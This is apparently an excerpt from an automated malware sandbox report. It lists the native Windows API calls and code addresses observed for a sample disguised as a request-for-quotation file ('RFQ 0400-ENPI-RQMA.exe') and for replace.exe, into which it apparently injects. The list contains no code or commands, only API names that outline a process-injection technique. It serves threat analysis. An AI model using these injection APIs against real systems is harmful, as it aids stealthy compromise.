            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014039B0 NtGetContextThread,2_2_014039B0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402BE0 NtQueryValueKey,2_2_01402BE0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402BF0 NtAllocateVirtualMemory,2_2_01402BF0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402B80 NtQueryInformationFile,2_2_01402B80
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402BA0 NtEnumerateValueKey,2_2_01402BA0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402AD0 NtReadFile,2_2_01402AD0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402AF0 NtWriteFile,2_2_01402AF0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402AB0 NtWaitForSingleObject,2_2_01402AB0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01403D70 NtOpenThread,2_2_01403D70
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402D00 NtSetInformationFile,2_2_01402D00
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402D10 NtMapViewOfSection,2_2_01402D10
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01403D10 NtOpenProcessToken,2_2_01403D10
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402D30 NtUnmapViewOfSection,2_2_01402D30
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402DD0 NtDelayExecution,2_2_01402DD0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402DB0 NtEnumerateKey,2_2_01402DB0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402C60 NtCreateKey,2_2_01402C60
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402C00 NtQueryInformationProcess,2_2_01402C00
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402CC0 NtQueryVirtualMemory,2_2_01402CC0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402CF0 NtOpenProcess,2_2_01402CF0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402CA0 NtQueryInformationToken,2_2_01402CA0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402F60 NtCreateProcessEx,2_2_01402F60
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402F30 NtCreateSection,2_2_01402F30
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402FE0 NtCreateFile,2_2_01402FE0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402F90 NtProtectVirtualMemory,2_2_01402F90
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402FA0 NtQuerySection,2_2_01402FA0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402FB0 NtResumeThread,2_2_01402FB0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402E30 NtWriteVirtualMemory,2_2_01402E30
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402EE0 NtQueueApcThread,2_2_01402EE0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402E80 NtReadVirtualMemory,2_2_01402E80
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402EA0 NtAdjustPrivilegesToken,2_2_01402EA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D4340 NtSetContextThread,LdrInitializeThunk,5_2_031D4340
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D4650 NtSuspendThread,LdrInitializeThunk,5_2_031D4650
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2B60 NtClose,LdrInitializeThunk,5_2_031D2B60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_031D2BA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_031D2BF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_031D2BE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2AD0 NtReadFile,LdrInitializeThunk,5_2_031D2AD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2AF0 NtWriteFile,LdrInitializeThunk,5_2_031D2AF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2F30 NtCreateSection,LdrInitializeThunk,5_2_031D2F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2FB0 NtResumeThread,LdrInitializeThunk,5_2_031D2FB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2FE0 NtCreateFile,LdrInitializeThunk,5_2_031D2FE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_031D2E80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_031D2EE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_031D2D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_031D2D30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2DD0 NtDelayExecution,LdrInitializeThunk,5_2_031D2DD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_031D2DF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_031D2C70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2C60 NtCreateKey,LdrInitializeThunk,5_2_031D2C60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_031D2CA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D35C0 NtCreateMutant,LdrInitializeThunk,5_2_031D35C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D39B0 NtGetContextThread,LdrInitializeThunk,5_2_031D39B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2B80 NtQueryInformationFile,5_2_031D2B80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2AB0 NtWaitForSingleObject,5_2_031D2AB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2F60 NtCreateProcessEx,5_2_031D2F60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2F90 NtProtectVirtualMemory,5_2_031D2F90
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2FA0 NtQuerySection,5_2_031D2FA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2E30 NtWriteVirtualMemory,5_2_031D2E30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2EA0 NtAdjustPrivilegesToken,5_2_031D2EA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2D00 NtSetInformationFile,5_2_031D2D00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2DB0 NtEnumerateKey,5_2_031D2DB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2C00 NtQueryInformationProcess,5_2_031D2C00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2CC0 NtQueryVirtualMemory,5_2_031D2CC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2CF0 NtOpenProcess,5_2_031D2CF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D3010 NtOpenDirectoryObject,5_2_031D3010
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D3090 NtSetValueKey,5_2_031D3090
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D3D10 NtOpenProcessToken,5_2_031D3D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D3D70 NtOpenThread,5_2_031D3D70
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_016ADA4C0_2_016ADA4C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B27F610_2_07B27F61
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B23C010_2_07B23C01
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B27C480_2_07B27C48
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B24AB00_2_07B24AB0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B229100_2_07B22910
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B236590_2_07B23659
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B2C4CC0_2_07B2C4CC
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B2C3100_2_07B2C310
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B2C3010_2_07B2C301
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B2A2000_2_07B2A200
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B231890_2_07B23189
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B2A1F00_2_07B2A1F0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B2A1C90_2_07B2A1C9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B28EE00_2_07B28EE0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B26E000_2_07B26E00
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B21DF90_2_07B21DF9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B26BC80_2_07B26BC8
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B259A00_2_07B259A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B249C10_2_07B249C1
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B2290B0_2_07B2290B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07B268570_2_07B26857
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07D891000_2_07D89100
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07D84CC00_2_07D84CC0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07D834B80_2_07D834B8
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07D84CB00_2_07D84CB0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07D82C480_2_07D82C48
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07D850F80_2_07D850F8
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07D830700_2_07D83070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 0_2_07D800070_2_07D80007
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_004011902_2_00401190
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_004032102_2_00403210
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_004023132_2_00402313
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_004023202_2_00402320
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_004025102_2_00402510
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0040FD1A2_2_0040FD1A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0040FD232_2_0040FD23
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0042D6732_2_0042D673
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_004166C32_2_004166C3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_004166BE2_2_004166BE
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0040FF432_2_0040FF43
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_004027502_2_00402750
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0040DFC32_2_0040DFC3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014581582_2_01458158
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0149B16B2_2_0149B16B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0140516C2_2_0140516C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C01002_2_013C0100
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF1722_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146A1182_2_0146A118
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014881CC2_2_014881CC
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DB1B02_2_013DB1B0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014901AA2_2_014901AA
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147F0CC2_2_0147F0CC
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014870E92_2_014870E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148F0E02_2_0148F0E0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C02_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148A3522_2_0148A352
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148132D2_2_0148132D
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BD34C2_2_013BD34C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014903E62_2_014903E6
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DE3F02_2_013DE3F0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0141739A2_2_0141739A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014702742_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014502C02_2_014502C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D52A02_2_013D52A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013ED2F02_2_013ED2F0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EB2C02_2_013EB2C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D05352_2_013D0535
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014875712_2_01487571
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014905912_2_01490591
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146D5B02_2_0146D5B0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014824462_2_01482446
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C14602_2_013C1460
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148F43F2_2_0148F43F
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147E4F62_2_0147E4F6
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D07702_2_013D0770
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F47502_2_013F4750
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148F7B02_2_0148F7B0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CC7C02_2_013CC7C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014816CC2_2_014816CC
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EC6E02_2_013EC6E0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E69622_2_013E6962
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D99502_2_013D9950
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EB9502_2_013EB950
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D29A02_2_013D29A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0149A9A62_2_0149A9A6
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143D8002_2_0143D800
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DA8402_2_013DA840
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D28402_2_013D2840
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B68B82_2_013B68B8
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FE8F02_2_013FE8F0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D38E02_2_013D38E0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148AB402_2_0148AB40
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148FB762_2_0148FB76
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01486BD72_2_01486BD7
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01445BF02_2_01445BF0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0140DBF92_2_0140DBF9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EFB802_2_013EFB80
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148FA492_2_0148FA49
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01487A462_2_01487A46
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01443A6C2_2_01443A6C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147DAC62_2_0147DAC6
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CEA802_2_013CEA80
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01415AA02_2_01415AA0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146DAAC2_2_0146DAAC
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01481D5A2_2_01481D5A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01487D732_2_01487D73
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DAD002_2_013DAD00
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D3D402_2_013D3D40
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E8DBF2_2_013E8DBF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CADE02_2_013CADE0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EFDC02_2_013EFDC0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D0C002_2_013D0C00
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01449C322_2_01449C32
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148FCF22_2_0148FCF2
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C0CF22_2_013C0CF2
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470CB52_2_01470CB5
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01444F402_2_01444F40
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F0F302_2_013F0F30
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148FF092_2_0148FF09
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01412F282_2_01412F28
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1F922_2_013D1F92
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144EFA02_2_0144EFA0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01393FD22_2_01393FD2
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01393FD52_2_01393FD5
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C2FC82_2_013C2FC8
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148FFB12_2_0148FFB1
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D0E592_2_013D0E59
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148EE262_2_0148EE26
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D9EB02_2_013D9EB0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148EEDB2_2_0148EEDB
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E2E902_2_013E2E90
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148CE932_2_0148CE93
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0325A3525_2_0325A352
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032603E65_2_032603E6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031AE3F05_2_031AE3F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032402745_2_03240274
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032202C05_2_032202C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031901005_2_03190100
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0323A1185_2_0323A118
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032281585_2_03228158
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032541A25_2_032541A2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032601AA5_2_032601AA
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032581CC5_2_032581CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032320005_2_03232000
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031C47505_2_031C4750
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031A07705_2_031A0770
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0319C7C05_2_0319C7C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031BC6E05_2_031BC6E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031A05355_2_031A0535
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032605915_2_03260591
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032444205_2_03244420
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_032524465_2_03252446
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0324E4F65_2_0324E4F6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0325AB405_2_0325AB40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03256BD75_2_03256BD7
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0319EA805_2_0319EA80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031B69625_2_031B6962
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0326A9A65_2_0326A9A6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031A29A05_2_031A29A0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031A28405_2_031A2840
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031AA8405_2_031AA840
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031868B85_2_031868B8
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031CE8F05_2_031CE8F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03242F305_2_03242F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031C0F305_2_031C0F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031E2F285_2_031E2F28
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03214F405_2_03214F40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0321EFA05_2_0321EFA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0325EE265_2_0325EE26
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031A0E595_2_031A0E59
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031B2E905_2_031B2E90
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0325CE935_2_0325CE93
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0325EEDB5_2_0325EEDB
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031AAD005_2_031AAD00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0323CD1F5_2_0323CD1F
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031B8DBF5_2_031B8DBF
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0319ADE05_2_0319ADE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031A0C005_2_031A0C00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03240CB55_2_03240CB5
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03190CF25_2_03190CF2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0325132D5_2_0325132D
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0318D34C5_2_0318D34C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031E739A5_2_031E739A
